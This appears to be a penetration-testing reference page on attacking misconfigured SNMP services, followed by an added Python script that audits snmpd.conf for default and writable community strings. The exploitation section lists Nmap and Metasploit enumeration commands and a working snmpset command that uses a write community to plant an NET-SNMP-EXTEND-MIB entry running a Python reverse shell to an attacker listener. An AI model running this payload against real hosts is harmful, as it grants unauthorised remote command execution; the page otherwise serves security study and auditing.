Simple Network Management Protocol (SNMP)
SNMP lets devices on a network expose management information to one another. A misconfigured SNMP service, typically one that accepts a default community string or grants write access, can hand an attacker detailed information about the system and, in some cases, arbitrary code execution.
Exploitation
Identifying SNMP on a Network
# Identify SNMP agents (UDP/161) with Nmap
nmap -sU -p161 $hosts
# Identify SNMP and read sysDescr (server type / operating system) with the snmp-sysdescr NSE script
nmap -sU -p161 $hosts --script=snmp-sysdescr
Identifying Default Community Strings
# Identify default community strings with the Metasploit snmp_login scanner (msfconsole: use <module>)
auxiliary/scanner/snmp/snmp_login
Exploiting SNMP with Write Access
# With a write (rw) community string, add a NET-SNMP-EXTEND-MIB row that runs a command
# $targetip is the SNMP agent; $ip / $port is the listener the spawned shell connects back to
# '=' tells snmpset to take each value's type from the loaded MIB (-m +NET-SNMP-EXTEND-MIB)
# Note: the nsExtendArgs value is single-quoted, so $ip and $port are not expanded by the shell and must be substituted by hand
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $targetip \
'nsExtendStatus."evil"' = createAndGo \
'nsExtendCommand."evil"' = /usr/bin/python \
'nsExtendArgs."evil"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$ip\",$port));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
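As an added example (not code from the original page), the following Python script audits a net-snmp snmpd.conf for the two conditions the "Identifying Default Community Strings" and "Exploiting SNMP with Write Access" sections depend on: default or guessable community strings, and community strings that grant SET (write) access. It also flags communities accepted from any source address and extend/exec directives that expose command output. The sample configuration and the finding format are constructed for this example; the directive names and argument order follow the snmpd.conf manual.

```python
"""Audit a net-snmp snmpd.conf for the misconfigurations an SNMP attacker looks for."""
from collections import Counter

# Community strings that ship as defaults or appear in every wordlist.
DEFAULT_COMMUNITIES = {"public", "private", "community", "manager", "admin", "snmp"}
# Directives that grant SNMP SET (write) access via a community string.
WRITE_DIRECTIVES = {"rwcommunity", "rwcommunity6"}
# Directives that register commands in NET-SNMP-EXTEND-MIB / the UCD exec tables.
COMMAND_DIRECTIVES = {"extend", "extend-sh", "extendfix", "exec", "execfix", "sh"}

# Constructed sample snmpd.conf for this example (not taken from any real host).
SAMPLE_CONF = """\
# Managed by nobody
rocommunity public
rwcommunity private
rocommunity  monitoring 10.0.0.0/24
rwcommunity6 private ::1
com2sec readonly default public
extend ping /bin/ping -c 1 127.0.0.1
"""


def _community_and_source(directive, parts):
    """Return (community, source) for directives that carry them, else (None, None)."""
    if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
        # Syntax: r[ow]community COMMUNITY [SOURCE [OID | -V VIEW]]
        community = parts[1] if len(parts) > 1 else ""
        source = parts[2] if len(parts) > 2 else "default"
        return community, source
    if directive == "com2sec":
        # Syntax: com2sec SECNAME SOURCE COMMUNITY
        community = parts[3] if len(parts) > 3 else ""
        source = parts[2] if len(parts) > 2 else "default"
        return community, source
    return None, None


def audit_snmpd_conf(text):
    """Return a list of findings; each is a dict with line, severity and issue."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()

        def add(severity, issue):
            findings.append({"line": lineno, "severity": severity, "issue": issue})

        if directive in WRITE_DIRECTIVES:
            add("HIGH", f"{directive} grants SET access; writable nsExtend* objects "
                        "turn that into command execution")

        community, source = _community_and_source(directive, parts)
        if community is not None:
            if community.lower() in DEFAULT_COMMUNITIES:
                add("HIGH", f"default community string {community!r}")
            if source == "default":
                add("MEDIUM", f"community {community!r} accepted from any source address")

        if directive in COMMAND_DIRECTIVES:
            add("MEDIUM", f"{directive} exposes command output over SNMP; confirm it is required")
    return findings


def summarize(findings):
    """Count findings per severity, e.g. {'HIGH': 6, 'MEDIUM': 4} for SAMPLE_CONF."""
    return dict(Counter(f["severity"] for f in findings))


if __name__ == "__main__":
    results = audit_snmpd_conf(SAMPLE_CONF)
    for f in results:
        print(f"line {f['line']:>3} [{f['severity']}] {f['issue']}")
    print(summarize(results))
```

Point it at /etc/snmp/snmpd.conf to get a per-line list. A clean result is a read-only community restricted to the monitoring host's source address (or SNMPv3 with authentication and privacy in place of community strings), with no rw community at all.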